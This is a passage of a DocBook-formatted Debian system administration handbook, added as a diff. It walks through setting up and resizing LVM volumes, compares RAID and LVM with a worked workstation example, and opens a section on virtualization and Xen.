+					It often makes sense, however, to have some kind of homogeneity among the physical components of a VG, and to split the VG into logical volumes that will have similar usage patterns. For instance, if the available hardware includes fast disks and slower disks, the fast ones could be clustered into one VG and the slower ones into another; chunks of the first one can then be assigned to applications requiring fast data access, while the second one will be kept for less demanding tasks.
+				</para>
+				 <para>
+					In any case, keep in mind that an LV isn't particularly attached to any one PV. It is possible to influence where the data from an LV are physically stored, but this possibility isn't required for day-to-day use. On the contrary: when the set of physical components of a VG evolves, the physical storage locations corresponding to a particular LV can be migrated across disks (while staying within the PVs assigned to the VG, of course).
+				</para>
+
+			</section>
+			 <section id="sect.lvm-setup">
+				<title>Setting up LVM</title>
+				 <para>
+					Let us now follow, step by step, the process of setting up LVM for a typical use case: we want to simplify a complex storage situation. Such a situation usually happens after some long and convoluted history of accumulated temporary measures. For the purposes of illustration, we'll consider a server where the storage needs have changed over time, ending up in a maze of available partitions split over several partially used disks. In more concrete terms, the following partitions are available:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							on the <filename>sdb</filename> disk, a <filename>sdb2</filename> partition, 4 GB;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							on the <filename>sdc</filename> disk, a <filename>sdc3</filename> partition, 3 GB;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							the <filename>sdd</filename> disk, 4 GB, is fully available;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							on the <filename>sdf</filename> disk, a <filename>sdf1</filename> partition, 4 GB; and a <filename>sdf2</filename> partition, 5 GB.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					In addition, let's assume that disks <filename>sdb</filename> and <filename>sdf</filename> are faster than the other two.
+				</para>
+				 <para>
+					Our goal is to set up three logical volumes for three different applications: a file server requiring 5 GB of storage space, a database (1 GB) and some space for back-ups (12 GB). The first two need good performance, but back-ups are less critical in terms of access speed. All these constraints prevent the use of partitions on their own; using LVM can abstract the physical size of the devices, so the only limit is the total available space.
+				</para>
+				 <para>
+					The required tools are in the <emphasis role="pkg">lvm2</emphasis> package and its dependencies. When they're installed, setting up LVM takes three steps, matching the three levels of concepts.
+				</para>
+				 <para>
+					First, we prepare the physical volumes using <command>pvcreate</command>:
+				</para>
+				 
+<screen id="screen.pvcreate"><computeroutput># </computeroutput><userinput>pvdisplay</userinput>
+<computeroutput># </computeroutput><userinput>pvcreate /dev/sdb2</userinput>
+<computeroutput>  Physical volume "/dev/sdb2" successfully created
+# </computeroutput><userinput>pvdisplay</userinput>
+<computeroutput>  "/dev/sdb2" is a new physical volume of "4.00 GiB"
+  --- NEW Physical volume ---
+  PV Name               /dev/sdb2
+  VG Name               
+  PV Size               4.00 GiB
+  Allocatable           NO
+  PE Size               0   
+  Total PE              0
+  Free PE               0
+  Allocated PE          0
+  PV UUID               0zuiQQ-j1Oe-P593-4tsN-9FGy-TY0d-Quz31I
+
+# </computeroutput><userinput>for i in sdc3 sdd sdf1 sdf2 ; do pvcreate /dev/$i ; done</userinput>
+<computeroutput>  Physical volume "/dev/sdc3" successfully created
+  Physical volume "/dev/sdd" successfully created
+  Physical volume "/dev/sdf1" successfully created
+  Physical volume "/dev/sdf2" successfully created
+# </computeroutput><userinput>pvdisplay -C</userinput>
+<computeroutput>  PV         VG   Fmt  Attr PSize PFree
+  /dev/sdb2       lvm2 ---  4.00g 4.00g
+  /dev/sdc3       lvm2 ---  3.09g 3.09g
+  /dev/sdd        lvm2 ---  4.00g 4.00g
+  /dev/sdf1       lvm2 ---  4.10g 4.10g
+  /dev/sdf2       lvm2 ---  5.22g 5.22g
+</computeroutput></screen>
+				 <para>
+					So far, so good; note that a PV can be set up on a full disk as well as on individual partitions of it. As shown above, the <command>pvdisplay</command> command lists the existing PVs, with two possible output formats.
+				</para>
+				 <para>
+					Now let's assemble these physical elements into VGs using <command>vgcreate</command>. We'll gather only PVs from the fast disks into a <filename>vg_critical</filename> VG; the other VG, <filename>vg_normal</filename>, will also include slower elements.
+				</para>
+				 
+<screen id="screen.vgcreate"><computeroutput># </computeroutput><userinput>vgdisplay</userinput>
+<computeroutput>  No volume groups found
+# </computeroutput><userinput>vgcreate vg_critical /dev/sdb2 /dev/sdf1</userinput>
+<computeroutput>  Volume group "vg_critical" successfully created
+# </computeroutput><userinput>vgdisplay</userinput>
+<computeroutput>  --- Volume group ---
+  VG Name               vg_critical
+  System ID             
+  Format                lvm2
+  Metadata Areas        2
+  Metadata Sequence No  1
+  VG Access             read/write
+  VG Status             resizable
+  MAX LV                0
+  Cur LV                0
+  Open LV               0
+  Max PV                0
+  Cur PV                2
+  Act PV                2
+  VG Size               8.09 GiB
+  PE Size               4.00 MiB
+  Total PE              2071
+  Alloc PE / Size       0 / 0   
+  Free  PE / Size       2071 / 8.09 GiB
+  VG UUID               bpq7zO-PzPD-R7HW-V8eN-c10c-S32h-f6rKqp
+
+# </computeroutput><userinput>vgcreate vg_normal /dev/sdc3 /dev/sdd /dev/sdf2</userinput>
+<computeroutput>  Volume group "vg_normal" successfully created
+# </computeroutput><userinput>vgdisplay -C</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize  VFree 
+  vg_critical   2   0   0 wz--n-  8.09g  8.09g
+  vg_normal     3   0   0 wz--n- 12.30g 12.30g
+</computeroutput></screen>
+				 <para>
+					Here again, commands are rather straightforward (and <command>vgdisplay</command> proposes two output formats). Note that it is quite possible to use two partitions of the same physical disk into two different VGs. Note also that we used a <filename>vg_</filename> prefix to name our VGs, but it is nothing more than a convention.
+				</para>
+				 <para>
+					We now have two “virtual disks”, sized about 8 GB and 12 GB, respectively. Let's now carve them up into “virtual partitions” (LVs). This involves the <command>lvcreate</command> command, and a slightly more complex syntax:
+				</para>
+				 
+<screen id="screen.lvcreate"><computeroutput># </computeroutput><userinput>lvdisplay</userinput>
+<computeroutput># </computeroutput><userinput>lvcreate -n lv_files -L 5G vg_critical</userinput>
+<computeroutput>  Logical volume "lv_files" created
+# </computeroutput><userinput>lvdisplay</userinput>
+<computeroutput>  --- Logical volume ---
+  LV Path                /dev/vg_critical/lv_files
+  LV Name                lv_files
+  VG Name                vg_critical
+  LV UUID                J3V0oE-cBYO-KyDe-5e0m-3f70-nv0S-kCWbpT
+  LV Write Access        read/write
+  LV Creation host, time mirwiz, 2015-06-10 06:10:50 -0400
+  LV Status              available
+  # open                 0
+  LV Size                5.00 GiB
+  Current LE             1280
+  Segments               2
+  Allocation             inherit
+  Read ahead sectors     auto
+  - currently set to     256
+  Block device           253:0
+
+# </computeroutput><userinput>lvcreate -n lv_base -L 1G vg_critical</userinput>
+<computeroutput>  Logical volume "lv_base" created
+# </computeroutput><userinput>lvcreate -n lv_backups -L 12G vg_normal</userinput>
+<computeroutput>  Logical volume "lv_backups" created
+# </computeroutput><userinput>lvdisplay -C</userinput>
+<computeroutput>  LV         VG          Attr     LSize  Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_base    vg_critical -wi-a---  1.00g                                           
+  lv_files   vg_critical -wi-a---  5.00g                                           
+  lv_backups vg_normal   -wi-a--- 12.00g</computeroutput></screen>
+				 <para>
+					Two parameters are required when creating logical volumes; they must be passed to the <command>lvcreate</command> as options. The name of the LV to be created is specified with the <literal>-n</literal> option, and its size is generally given using the <literal>-L</literal> option. We also need to tell the command what VG to operate on, of course, hence the last parameter on the command line.
+				</para>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> <command>lvcreate</command> options</title>
+				 <para>
+					The <command>lvcreate</command> command has several options to allow tweaking how the LV is created.
+				</para>
+				 <para>
+					Let's first describe the <literal>-l</literal> option, with which the LV's size can be given as a number of blocks (as opposed to the “human” units we used above). These blocks (called PEs, <emphasis>physical extents</emphasis>, in LVM terms) are contiguous units of storage space in PVs, and they can't be split across LVs. When one wants to define storage space for an LV with some precision, for instance to use the full available space, the <literal>-l</literal> option will probably be preferred over <literal>-L</literal>.
+				</para>
+				 <para>
+					It's also possible to hint at the physical location of an LV, so that its extents are stored on a particular PV (while staying within the ones assigned to the VG, of course). Since we know that <filename>sdb</filename> is faster than <filename>sdf</filename>, we may want to store the <filename>lv_base</filename> there if we want to give an advantage to the database server compared to the file server. The command line becomes: <command>lvcreate -n lv_base -L 1G vg_critical /dev/sdb2</command>. Note that this command can fail if the PV doesn't have enough free extents. In our example, we would probably have to create <filename>lv_base</filename> before <filename>lv_files</filename> to avoid this situation – or free up some space on <filename>sdb2</filename> with the <command>pvmove</command> command.
+				</para>
+				 </sidebar> <para>
+					Logical volumes, once created, end up as block device files in <filename>/dev/mapper/</filename>:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>ls -l /dev/mapper</userinput>
+<computeroutput>total 0
+crw------- 1 root root 10, 236 Jun 10 16:52 control
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_critical-lv_files -&gt; ../dm-0
+lrwxrwxrwx 1 root root       7 Jun 10 17:05 vg_normal-lv_backups -&gt; ../dm-2
+# </computeroutput><userinput>ls -l /dev/dm-*</userinput>
+<computeroutput>brw-rw---T 1 root disk 253, 0 Jun 10 17:05 /dev/dm-0
+brw-rw---- 1 root disk 253, 1 Jun 10 17:05 /dev/dm-1
+brw-rw---- 1 root disk 253, 2 Jun 10 17:05 /dev/dm-2
+</computeroutput></screen>
+				 <sidebar> <title><emphasis>NOTE</emphasis> Autodetecting LVM volumes</title>
+				 <para>
+					When the computer boots, the <filename>lvm2-activation</filename> systemd service unit executes <command>vgchange -aay</command> to “activate” the volume groups: it scans the available devices; those that have been initialized as physical volumes for LVM are registered into the LVM subsystem, those that belong to volume groups are assembled, and the relevant logical volumes are started and made available. There is therefore no need to edit configuration files when creating or modifying LVM volumes.
+				</para>
+				 <para>
+					Note, however, that the layout of the LVM elements (physical and logical volumes, and volume groups) is backed up in <filename>/etc/lvm/backup</filename>, which can be useful in case of a problem (or just to sneak a peek under the hood).
+				</para>
+				 </sidebar> <para>
+					To make things easier, convenience symbolic links are also created in directories matching the VGs:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>ls -l /dev/vg_critical</userinput>
+<computeroutput>total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_base -&gt; ../dm-1
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_files -&gt; ../dm-0
+# </computeroutput><userinput>ls -l /dev/vg_normal</userinput>
+<computeroutput>total 0
+lrwxrwxrwx 1 root root 7 Jun 10 17:05 lv_backups -&gt; ../dm-2</computeroutput></screen>
+				 <para>
+					The LVs can then be used exactly like standard partitions:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>mkfs.ext4 /dev/vg_normal/lv_backups</userinput>
+<computeroutput>mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 3145728 4k blocks and 786432 inodes
+Filesystem UUID: b5236976-e0e2-462e-81f5-0ae835ddab1d
+[...]
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </computeroutput><userinput>mkdir /srv/backups</userinput>
+<computeroutput># </computeroutput><userinput>mount /dev/vg_normal/lv_backups /srv/backups</userinput>
+<computeroutput># </computeroutput><userinput>df -h /srv/backups</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_normal-lv_backups   12G   30M   12G   1% /srv/backups
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>cat /etc/fstab</userinput>
+<computeroutput>[...]
+/dev/vg_critical/lv_base    /srv/base       ext4 defaults 0 2
+/dev/vg_critical/lv_files   /srv/files      ext4 defaults 0 2
+/dev/vg_normal/lv_backups   /srv/backups    ext4 defaults 0 2</computeroutput></screen>
+				 <para>
+					From the applications' point of view, the myriad small partitions have now been abstracted into one large 12 GB volume, with a friendlier name.
+				</para>
+
+			</section>
+			 <section id="sect.lvm-over-time">
+				<title>LVM Over Time</title>
+				 <para>
+					Even though the ability to aggregate partitions or physical disks is convenient, this is not the main advantage brought by LVM. The flexibility it brings is especially noticed as time passes, when needs evolve. In our example, let's assume that new large files must be stored, and that the LV dedicated to the file server is too small to contain them. Since we haven't used the whole space available in <filename>vg_critical</filename>, we can grow <filename>lv_files</filename>. For that purpose, we'll use the <command>lvresize</command> command, then <command>resize2fs</command> to adapt the filesystem accordingly:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>df -h /srv/files/</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  5.0G  4.6G  146M  97% /srv/files
+# </computeroutput><userinput>lvdisplay -C vg_critical/lv_files</userinput>
+<computeroutput>  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 5.00g
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   2   2   0 wz--n- 8.09g 2.09g
+# </computeroutput><userinput>lvresize -L 7G vg_critical/lv_files</userinput>
+<computeroutput>  Size of logical volume vg_critical/lv_files changed from 5.00 GiB (1280 extents) to 7.00 GiB (1792 extents).
+  Logical volume lv_files successfully resized
+# </computeroutput><userinput>lvdisplay -C vg_critical/lv_files</userinput>
+<computeroutput>  LV       VG          Attr     LSize Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_files vg_critical -wi-ao-- 7.00g
+# </computeroutput><userinput>resize2fs /dev/vg_critical/lv_files</userinput>
+<computeroutput>resize2fs 1.42.12 (29-Aug-2014)
+Filesystem at /dev/vg_critical/lv_files is mounted on /srv/files; on-line resizing required
+old_desc_blocks = 1, new_desc_blocks = 1
+The filesystem on /dev/vg_critical/lv_files is now 1835008 (4k) blocks long.
+
+# </computeroutput><userinput>df -h /srv/files/</userinput>
+<computeroutput>Filesystem                        Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_files  6.9G  4.6G  2.1G  70% /srv/files</computeroutput></screen>
+				 <sidebar> <title><emphasis>CAUTION</emphasis> Resizing filesystems</title>
+				 <para>
+					Not all filesystems can be resized online; resizing a volume can therefore require unmounting the filesystem first and remounting it afterwards. Of course, if one wants to shrink the space allocated to an LV, the filesystem must be shrunk first; the order is reversed when the resizing goes in the other direction: the logical volume must be grown before the filesystem on it. It's rather straightforward, since at no time must the filesystem size be larger than the block device where it resides (whether that device is a physical partition or a logical volume).
+				</para>
+				 <para>
+					The ext3, ext4 and xfs filesystems can be grown online, without unmounting; shrinking requires an unmount. The reiserfs filesystem allows online resizing in both directions. The venerable ext2 allows neither, and always requires unmounting.
+				</para>
+				 </sidebar> <para>
+					We could proceed in a similar fashion to extend the volume hosting the database, only we've reached the VG's available space limit:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>df -h /srv/base/</userinput>
+<computeroutput>Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base 1008M  854M  104M  90% /srv/base
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree 
+  vg_critical   2   2   0 wz--n- 8.09g 92.00m</computeroutput></screen>
+				 <para>
+					No matter, since LVM allows adding physical volumes to existing volume groups. For instance, maybe we've noticed that the <filename>sdb1</filename> partition, which was so far used outside of LVM, only contained archives that could be moved to <filename>lv_backups</filename>. We can now recycle it and integrate it to the volume group, and thereby reclaim some available space. This is the purpose of the <command>vgextend</command> command. Of course, the partition must be prepared as a physical volume beforehand. Once the VG has been extended, we can use similar commands as previously to grow the logical volume then the filesystem:
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>pvcreate /dev/sdb1</userinput>
+<computeroutput>  Physical volume "/dev/sdb1" successfully created
+# </computeroutput><userinput>vgextend vg_critical /dev/sdb1</userinput>
+<computeroutput>  Volume group "vg_critical" successfully extended
+# </computeroutput><userinput>vgdisplay -C vg_critical</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize VFree
+  vg_critical   3   2   0 wz--n- 9.09g 1.09g
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>df -h /srv/base/</userinput>
+<computeroutput>Filesystem                       Size  Used Avail Use% Mounted on
+/dev/mapper/vg_critical-lv_base  2.0G  854M  1.1G  45% /srv/base</computeroutput></screen>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Advanced LVM</title>
+				 <para>
+					LVM also caters for more advanced uses, where many details can be specified by hand. For instance, an administrator can tweak the size of the blocks that make up physical and logical volumes, as well as their physical layout. It is also possible to move blocks across PVs, for instance to fine-tune performance or, in a more mundane way, to free a PV when one needs to extract the corresponding physical disk from the VG (whether to affect it to another VG or to remove it from LVM altogether). The manual pages describing the commands are generally clear and detailed. A good entry point is the <citerefentry><refentrytitle>lvm</refentrytitle>
+					 <manvolnum>8</manvolnum></citerefentry> manual page.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section id="sect.raid-or-lvm">
+			<title>RAID or LVM?</title>
+			 <para>
+				RAID and LVM both bring indisputable advantages as soon as one leaves the simple case of a desktop computer with a single hard disk where the usage pattern doesn't change over time. However, RAID and LVM go in two different directions, with diverging goals, and it is legitimate to wonder which one should be adopted. The most appropriate answer will of course depend on current and foreseeable requirements.
+			</para>
+			 <para>
+				There are a few simple cases where the question doesn't really arise. If the requirement is to safeguard data against hardware failures, then obviously RAID will be set up on a redundant array of disks, since LVM doesn't really address this problem. If, on the other hand, the need is for a flexible storage scheme where the volumes are made independent of the physical layout of the disks, RAID doesn't help much and LVM will be the natural choice.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> If performance matters…</title>
+			 <para>
+				If input/output speed is of the essence, especially in terms of access times, using LVM and/or RAID in one of the many combinations may have some impact on performances, and this may influence decisions as to which to pick. However, these differences in performance are really minor, and will only be measurable in a few use cases. If performance matters, the best gain to be obtained would be to use non-rotating storage media (<indexterm><primary>SSD</primary></indexterm><emphasis>solid-state drives</emphasis> or SSDs); their cost per megabyte is higher than that of standard hard disk drives, and their capacity is usually smaller, but they provide excellent performance for random accesses. If the usage pattern includes many input/output operations scattered all around the filesystem, for instance for databases where complex queries are routinely being run, then the advantage of running them on an SSD far outweigh whatever could be gained by picking LVM over RAID or the reverse. In these situations, the choice should be determined by other considerations than pure speed, since the performance aspect is most easily handled by using SSDs.
+			</para>
+			 </sidebar> <para>
+				The third notable use case is when one just wants to aggregate two disks into one volume, either for performance reasons or to have a single filesystem that is larger than any of the available disks. This case can be addressed both by a RAID-0 (or even linear-RAID) and by an LVM volume. When in this situation, and barring extra constraints (for instance, keeping in line with the rest of the computers if they only use RAID), the configuration of choice will often be LVM. The initial set up is barely more complex, and that slight increase in complexity more than makes up for the extra flexibility that LVM brings if the requirements change or if new disks need to be added.
+			</para>
+			 <para>
+				Then of course, there is the really interesting use case, where the storage system needs to be made both resistant to hardware failure and flexible when it comes to volume allocation. Neither RAID nor LVM can address both requirements on their own; no matter, this is where we use both at the same time — or rather, one on top of the other. The scheme that has all but become a standard since RAID and LVM have reached maturity is to ensure data redundancy first by grouping disks in a small number of large RAID arrays, and to use these RAID arrays as LVM physical volumes; logical partitions will then be carved from these LVs for filesystems. The selling point of this setup is that when a disk fails, only a small number of RAID arrays will need to be reconstructed, thereby limiting the time spent by the administrator for recovery.
+			</para>
+			 <para>
+				Let's take a concrete example: the public relations department at Falcot Corp needs a workstation for video editing, but the department's budget doesn't allow investing in high-end hardware from the bottom up. A decision is made to favor the hardware that is specific to the graphic nature of the work (monitor and video card), and to stay with generic hardware for storage. However, as is widely known, digital video does have some particular requirements for its storage: the amount of data to store is large, and the throughput rate for reading and writing this data is important for the overall system performance (more than typical access time, for instance). These constraints need to be fulfilled with generic hardware, in this case two 300 GB SATA hard disk drives; the system data must also be made resistant to hardware failure, as well as some of the user data. Edited videoclips must indeed be safe, but video rushes pending editing are less critical, since they're still on the videotapes.
+			</para>
+			 <para>
+				RAID-1 and LVM are combined to satisfy these constraints. The disks are attached to two different SATA controllers to optimize parallel access and reduce the risk of a simultaneous failure, and they therefore appear as <filename>sda</filename> and <filename>sdc</filename>. They are partitioned identically along the following scheme:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>fdisk -l /dev/sda</userinput>
+<computeroutput>
+Disk /dev/sda: 300 GB, 300090728448 bytes, 586114704 sectors
+Units: sectors of 1 * 512 = 512 bytes
+Sector size (logical/physical): 512 bytes / 512 bytes
+I/O size (minimum/optimal): 512 bytes / 512 bytes
+Disklabel type: dos
+Disk identifier: 0x00039a9f
+
+Device    Boot     Start       End   Sectors Size Id Type
+/dev/sda1 *         2048   1992060   1990012 1.0G fd Linux raid autodetect
+/dev/sda2        1992061   3984120   1992059 1.0G 82 Linux swap / Solaris
+/dev/sda3        4000185 586099395 582099210 298G 5  Extended
+/dev/sda5        4000185 203977305 199977120 102G fd Linux raid autodetect
+/dev/sda6      203977306 403970490 199993184 102G fd Linux raid autodetect
+/dev/sda7      403970491 586099395 182128904  93G 8e Linux LVM</computeroutput></screen>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						The first partitions of both disks (about 1 GB) are assembled into a RAID-1 volume, <filename>md0</filename>. This mirror is directly used to store the root filesystem.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						The <filename>sda2</filename> and <filename>sdc2</filename> partitions are used as swap partitions, providing a total 2 GB of swap space. With 1 GB of RAM, the workstation has a comfortable amount of available memory.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						The <filename>sda5</filename> and <filename>sdc5</filename> partitions, as well as <filename>sda6</filename> and <filename>sdc6</filename>, are assembled into two new RAID-1 volumes of about 100 GB each, <filename>md1</filename> and <filename>md2</filename>. Both these mirrors are initialized as physical volumes for LVM, and assigned to the <filename>vg_raid</filename> volume group. This VG thus contains about 200 GB of safe space.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						The remaining partitions, <filename>sda7</filename> and <filename>sdc7</filename>, are directly used as physical volumes, and assigned to another VG called <filename>vg_bulk</filename>, which therefore ends up with roughly 200 GB of space.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Once the VGs are created, they can be partitioned in a very flexible way. One must keep in mind that LVs created in <filename>vg_raid</filename> will be preserved even if one of the disks fails, which will not be the case for LVs created in <filename>vg_bulk</filename>; on the other hand, the latter will be allocated in parallel on both disks, which allows higher read or write speeds for large files.
+			</para>
+			 <para>
+				We will therefore create the <filename>lv_usr</filename>, <filename>lv_var</filename> and <filename>lv_home</filename> LVs on <filename>vg_raid</filename>, to host the matching filesystems; another large LV, <filename>lv_movies</filename>, will be used to host the definitive versions of movies after editing. The other VG will be split into a large <filename>lv_rushes</filename>, for data straight out of the digital video cameras, and a <filename>lv_tmp</filename> for temporary files. The location of the work area is a less straightforward choice to make: while good performance is needed for that volume, is it worth risking losing work if a disk fails during an editing session? Depending on the answer to that question, the relevant LV will be created on one VG or the other.
+			</para>
+			 <para>
+				We now have both some redundancy for important data and much flexibility in how the available space is split across the applications. Should new software be installed later on (for editing audio clips, for instance), the LV hosting <filename>/usr/</filename> can be grown painlessly.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Why three RAID-1 volumes?</title>
+			 <para>
+				We could have set up one RAID-1 volume only, to serve as a physical volume for <filename>vg_raid</filename>. Why create three of them, then?
+			</para>
+			 <para>
+				The rationale for the first split (<filename>md0</filename> vs. the others) is about data safety: data written to both elements of a RAID-1 mirror are exactly the same, and it is therefore possible to bypass the RAID layer and mount one of the disks directly. In case of a kernel bug, for instance, or if the LVM metadata become corrupted, it is still possible to boot a minimal system to access critical data such as the layout of disks in the RAID and LVM volumes; the metadata can then be reconstructed and the files can be accessed again, so that the system can be brought back to its nominal state.
+			</para>
+			 <para>
+				The rationale for the second split (<filename>md1</filename> vs. <filename>md2</filename>) is less clear-cut, and more related to acknowledging that the future is uncertain. When the workstation is first assembled, the exact storage requirements are not necessarily known with perfect precision; they can also evolve over time. In our case, we can't know in advance the actual storage space requirements for video rushes and complete video clips. If one particular clip needs a very large amount of rushes, and the VG dedicated to redundant data is less than halfway full, we can re-use some of its unneeded space. We can remove one of the physical volumes, say <filename>md2</filename>, from <filename>vg_raid</filename> and either assign it to <filename>vg_bulk</filename> directly (if the expected duration of the operation is short enough that we can live with the temporary drop in performance), or undo the RAID setup on <filename>md2</filename> and integrate its components <filename>sda6</filename> and <filename>sdc6</filename> into the bulk VG (which grows by 200 GB instead of 100 GB); the <filename>lv_rushes</filename> logical volume can then be grown according to requirements.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.virtualization">
+		<title>Virtualization</title>
+		 <indexterm>
+			<primary>virtualization</primary>
+		</indexterm>
+		 <para>
+			Virtualization is one of the most major advances in the recent years of computing. The term covers various abstractions and techniques simulating virtual computers with a variable degree of independence on the actual hardware. One physical server can then host several systems working at the same time and in isolation. Applications are many, and often derive from this isolation: test environments with varying configurations for instance, or separation of hosted services across different virtual machines for security.
+		</para>
+		 <para>
+			There are multiple virtualization solutions, each with its own pros and cons. This book will focus on Xen, LXC, and KVM, but other noteworthy implementations include the following:
+		</para>
+		 <indexterm>
+			<primary><emphasis>VMWare</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>Bochs</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>QEMU</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>VirtualBox</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>KVM</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis>LXC</emphasis></primary>
+		</indexterm>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					QEMU is a software emulator for a full computer; performances are far from the speed one could achieve running natively, but this allows running unmodified or experimental operating systems on the emulated hardware. It also allows emulating a different hardware architecture: for instance, an <emphasis>amd64</emphasis> system can emulate an <emphasis>arm</emphasis> computer. QEMU is free software. <ulink type="block" url="http://www.qemu.org/" />
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					Bochs is another free virtual machine, but it only emulates the x86 architectures (i386 and amd64).
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					VMWare is a proprietary virtual machine; being one of the oldest out there, it is also one of the most widely-known. It works on principles similar to QEMU. VMWare proposes advanced features such as snapshotting a running virtual machine. <ulink type="block" url="http://www.vmware.com/" />
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					VirtualBox is a virtual machine that is mostly free software (some extra components are available under a proprietary license). Unfortunately it is in Debian's “contrib” section because it includes some precompiled files that cannot be rebuilt without a proprietary compiler and it currently only resides in Debian Unstable as Oracle's policies make it impossible to keep it secure in a Debian stable release (see <ulink url="https://bugs.debian.org/794466">#794466</ulink>). While younger than VMWare and restricted to the i386 and amd64 architectures, it still includes some snapshotting and other interesting features. <ulink type="block" url="http://www.virtualbox.org/" />
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <section id="sect.xen">
+			<title>Xen</title>
+			 <para>
+				Xen <indexterm><primary>Xen</primary></indexterm> is a “paravirtualization” solution. It introduces a thin abstraction layer, called a “hypervisor”, between the hardware and the upper systems; this acts as a referee that controls access to hardware from the virtual machines. However, it only handles a few of the instructions, the rest is directly executed by the hardware on behalf of the systems. The main advantage is that performances are not degraded, and systems run close to native speed; the drawback is that the kernels of the operating systems one wishes to use on a Xen hypervisor need to be adapted to run on Xen.
+			</para>
+			 <para>
+				Let's spend some time on terms. The hypervisor is the lowest layer, that runs directly on the hardware, even below the kernel. This hypervisor can split the rest of the software across several <emphasis>domains</emphasis>, which can be seen as so many virtual machines. One of these domains (the first one that gets started) is known as <emphasis>dom0</emphasis>, and has a special role, since only this domain can control the hypervisor and the execution of other domains. These other domains are known as <emphasis>domU</emphasis>. In other words, and from a user point of view, the <emphasis>dom0</emphasis> matches the “host” of other virtualization systems, while a <emphasis>domU</emphasis> can be seen as a “guest”.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> Xen and the various versions of Linux</title>
+			 <para>
+				Xen was initially developed as a set of patches that lived out of the official tree, and not integrated to the Linux kernel. At the same time, several upcoming virtualization systems (including KVM) required some generic virtualization-related functions to facilitate their integration, and the Linux kernel gained this set of functions (known as the <emphasis>paravirt_ops</emphasis> or <emphasis>pv_ops</emphasis> interface). Since the Xen patches were duplicating some of the functionality of this interface, they couldn't be accepted officially.
+			</para>
+			 <para>
+				Xensource, the company behind Xen, therefore had to port Xen to this new framework, so that the Xen patches could be merged into the official Linux kernel. That meant a lot of code rewrite, and although Xensource soon had a working version based on the paravirt_ops interface, the patches were only progressively merged into the official kernel. The merge was completed in Linux 3.0. <ulink type="block" url="http://wiki.xenproject.org/wiki/XenParavirtOps" />
+			</para>
+			 <para>
+				Since <emphasis role="distribution">Jessie</emphasis> is based on version 3.16 of the Linux kernel, the standard <emphasis role="pkg">linux-image-686-pae</emphasis> and <emphasis role="pkg">linux-image-amd64</emphasis> packages include the necessary code, and the distribution-specific patching that was required for <emphasis role="distribution">Squeeze</emphasis> and earlier versions of Debian is no more. <ulink type="block" url="http://wiki.xenproject.org/wiki/Xen_Kernel_Feature_Matrix" />
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>NOTE</emphasis> Architectures compatible with Xen</title>
+			 <para>
+				Xen is currently only available for the i386, amd64, arm64 and armhf architectures.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>CULTURE</emphasis> Xen and non-Linux kernels</title>
+			 <para>
